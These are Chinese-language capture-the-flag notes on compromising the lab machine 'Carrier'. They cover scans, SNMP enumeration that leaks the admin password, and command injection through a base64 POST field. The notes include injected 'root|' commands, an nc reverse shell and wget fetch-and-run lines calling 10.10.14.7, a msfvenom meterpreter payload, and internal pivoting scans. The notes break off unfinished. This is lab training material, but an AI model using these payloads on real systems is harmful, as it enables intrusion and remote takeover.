Carrier(snmp泄露敏感信息)

scan

1
2
3
4
5
6
7
8
9
10
11
12
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login
1
2
3
4
5
6
7
gobuster -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/img (Status: 301)
/tools (Status: 301)
/doc (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

searchsploit lyghtspeed

google “lightspeed login exploit”


admin’ or ‘1’=’1’

Invalid username/password

sqlmap -r 1.req


info

http://10.10.10.105/doc/error_codes.pdf

45007 证书无效或者过期

45009 尚未设置系统凭据

默认管理员用户密码已设置(请参阅机箱序列号) 9


1
2
curl http://10.10.10.105/tools/remote.php
License expired, exiting...

nmap snmp scan

1
2
3
nmap -sU 10.10.10.105 -vv
67/udp  open|filtered dhcps   no-response
161/udp open          snmp    udp-response ttl 62

参考资料:nmap-script-scan

1
2
3
4
5
6
7
8
9
10
11
12
13
locate *snmp*.nse
/usr/share/nmap/scripts/snmp-brute.nse
/usr/share/nmap/scripts/snmp-hh3c-logins.nse
/usr/share/nmap/scripts/snmp-info.nse
/usr/share/nmap/scripts/snmp-interfaces.nse
/usr/share/nmap/scripts/snmp-ios-config.nse
/usr/share/nmap/scripts/snmp-netstat.nse
/usr/share/nmap/scripts/snmp-processes.nse
/usr/share/nmap/scripts/snmp-sysdescr.nse
/usr/share/nmap/scripts/snmp-win32-services.nse
/usr/share/nmap/scripts/snmp-win32-shares.nse
/usr/share/nmap/scripts/snmp-win32-software.nse
/usr/share/nmap/scripts/snmp-win32-users.nse

nmap –script=snmp-info.nse 10.10.10.105 -sU -p 161 PORT STATE SERVICE 161/udp open snmp | snmp-info: | enterprise: pysnmp | engineIDFormat: octets | engineIDData: 77656201e8e908 | snmpEngineBoots: 2 |_ snmpEngineTime: 3d20h55m11s

nmap –script=snmp-brute.nse 10.10.10.105 -sU -p 161 PORT STATE SERVICE 161/udp open snmp | snmp-brute: |_ public - Valid credentials

nmap –script=snmp-processes.nse 10.10.10.105 -sU -p 161 nmap –script=snmp-netstat.nse 10.10.10.105 -sU -p 161 nmap –script=brute 10.10.10.105 -sU -p 161 nmap –script=snmp-hh3c-logins.nse 10.10.10.105 -sU -p 161 snmp-hh3c-logins.nse

snmpwalk

  • https://github.com/grutz/h3c-pt-tools/blob/master/hh3c-usermib-disclosure.txt
  • https://www.comparitech.com/net-admin/snmpwalk-examples-windows-linux/
  • https://www.huawei.com/cn/psirt/security-advisories/hw-u_194647

MIB代表management information base,管理信息库,保存网络中各种设备的参数信息。

snmpwalk -h

snmpwalk -c public -v 1 10.10.10.105 请求OID对象标识 14

OID对象标识就是3.6.1.2.1.47.1.1.1.1.11 前六位3.6.1.2.1.47,代表主机或路由器的操作系统


snmpwalk -v1 -c public 10.10.10.105 .3.6.1.2.1.47.1.1.1.1.11 iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: “SN#NET_45JDX23” End of MIB


-O OUTOPTS n: print OIDs numerically snmpwalk -v1 -On -c public 10.10.10.105

.1.3.6.1.2.1.47.1.1.1.1.11 = STRING: “SN#NET_45JDX23” End of MIB


snmpwalk -v1 -c public 10.10.10.105 1.3.6.1.2.1.47.1.1.1.1.11

snmpwalk -c public -v 1 10.10.10.105 system

snmpwalk -v2c -c public 10.10.10.105 .1.3.6.1.2.1.47.4.2.1.2 iso.3.6.1.2.1.47.4.2.1.2 = No more variables left in this MIB View (It is past the end of the MIB tree) 尝试获取进程列表

用admin/NET_45JDX23,登陆后。burp抓包,发现一个post方式的远程命令执行,其中quagga,应该是用户名,此功能可能是检查某用户运行的所有进程。 4

raw base64 info
quagga cXVhZ2dh  
root cm9vdAo=  
root|whoami xx root
root|cat /etc/passwd cm9vdHxjYXQgL2V0Yy9wYXNzd2Q=  
whereis nc /bin/nc openbsd类型的nc,没有-e选项
root|/bin/nc -e /bin/bash 10.10.14.7 9900 xx 无效
root|uname -a cm9vdHx1bmFtZSAtYQ== Linux r1 4.15.0-24-generic #26-Ubuntu SMP Wed Jun 13 08:44:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
root|whereis wget xx /usr/bin/wget
pwd xx /root
cat /root/root.txt xx can’t read root.txt
root|ls -al xx  
root|wget http://10.10.14.7/payload.elf;chmod +x payload.elf;./payload.elf    

root|cd /root;net -e /bin/bash 10.10.14.7 2233|

1
2
3
4
5
msfvenom --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9900 -f elf -o payload.elf

python -m SimpleHTTPServer 80
root|wget http://10.10.14.7/payload.elf
handler -H 10.10.14.7 -P 9900 -p linux/x64/meterpreter/reverse_tcp

获得shell

通过web rce,msf生成载荷上传运行后,获得meterpreter shell。

info enum

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
find . -name "diag.php"
find: './dev/.lxd-mounts': Permission denied
find: './proc/tty/driver': Permission denied
find: './sys/kernel/debug': Permission denied
find: './sys/fs/pstore': Permission denied
find: './sys/fs/fuse/connections/49': Permission denied

find . -name ".ssh"
/home/ubuntu/.ssh/authorized_keys  空的
./root/.ssh

---
cd /root/.ssh
cat authorized_keys
cat 

netstat -an | grep 80
/usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/bash")'

---
ping -c 4 10.10.10.105
traceroute 10.10.10.105 命令未找到
nc -nvz  10.10.10.105 1-100
Connection to 10.10.10.105 21 port [tcp/*] succeeded!
Connection to 10.10.10.105 22 port [tcp/*] succeeded!

ssh 10.10.10.105 需要密码

info

通过查看/root/.ssh/authorized_keys,可知,root@web,ppacket@carrier,有两个主机。现在是root@r1,接下来准备渗透另外两个主机。

7

http://10.10.10.105/doc/diagram_for_tac.png diagram_for_tac

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
网关ip:10.99.64.1
目标机的ip: 10.99.64.2,10.78.10.1,10.78.11.1

---
root@r1:~# netstat -an
netstat -an | grep 22
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        0      0 10.99.64.2:22           10.99.64.251:42676      ESTABLISHED
tcp        0      0 10.99.64.2:22           10.99.64.251:48050      ESTABLISHED
tcp        0    192 10.99.64.2:51982        10.10.14.7:9900         ESTABLISHED
tcp        0       10.99.64.2:22           10.99.64.251:48050      ESTABLISHED
发现本地IP,通过9900端口和目标机10.99.64.2,建立连接
---
nc -nvz 10.99.64.251 1-100
22,80 open

wget http://10.99.64.251,确认该内网ip,就是ip-10.10.10.105
---
ssh 10.99.64.251
Permission denied (publickey).
不允许登陆
ssh root@10.99.64.251
---
eth0网关
ping -c 4 10.99.64.1
nc -nvz  10.99.64.1 1-100

Connection to 10.99.64.1 21 port [tcp/*] succeeded!
Connection to 10.99.64.1 22 port [tcp/*] succeeded!
Connection to 10.99.64.1 53 port [tcp/*] succeeded!

ssh 10.99.64.1
ftp 10.99.64.1,匿名登陆成功,目录为/,无任何文件,不可写

---
nc -nvz  10.78.10.2 1-100 可能是eth1网段网关
22 open

nc -nvz  10.78.11.2 1-100 eth2网关
22 open

ssh 10.78.10.2
ssh 10.78.11.2

ifconfig

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:d9:04:ea  
          inet addr:10.99.64.2  Bcast:10.99.64.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fed9:4ea/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2581 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1982 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3241601 (3.2 MB)  TX bytes:295977 (295.9 KB)

eth1      Link encap:Ethernet  HWaddr 00:16:3e:8a:f2:4f  
          inet addr:10.78.10.1  Bcast:10.78.10.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe8a:f24f/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:223 errors:0 dropped:0 overruns:0 frame:0
          TX packets:198 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:16115 (16.1 KB)  TX bytes:14695 (14.6 KB)

eth2      Link encap:Ethernet  HWaddr 00:16:3e:20:98:df  
          inet addr:10.78.11.1  Bcast:10.78.11.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe20:98df/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:231 errors:0 dropped:0 overruns:0 frame:0
          TX packets:183 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:16436 (16.4 KB)  TX bytes:13415 (13.4 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:196 errors:0 dropped:0 overruns:0 frame:0
          TX packets:196 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:15872 (15.8 KB)  TX bytes:15872 (15.8 KB)

route

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
default         10.99.64.1      0.0.0.0         UG    0      0        0 eth0
10.78.10.0      *               255.255.255.0   U     0      0        0 eth1
10.78.11.0      *               255.255.255.0   U     0      0        0 eth2
10.99.64.0      *               255.255.255.0   U     0      0        0 eth0
10.100.10.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.11.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.12.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.13.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.14.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.15.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.16.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.17.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.18.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.19.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.100.20.0     10.78.10.2      255.255.255.0   UG    0      0        0 eth1
10.120.10.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.11.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.12.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.13.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.14.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.15.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.16.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.17.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.18.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.19.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2
10.120.20.0     10.78.11.2      255.255.255.0   UG    0      0        0 eth2

内网python扫描

https://raw.githubusercontent.com/AnthraX1/InsightScan/master/scanner.py

wget http://10.10.14.7/scanner.py

/usr/bin/python3.5 scanner.py -h

python2.7和python3.5不兼容,目标主机只有python3.5,导致该py脚本无法运行。

上传nmap

8

待续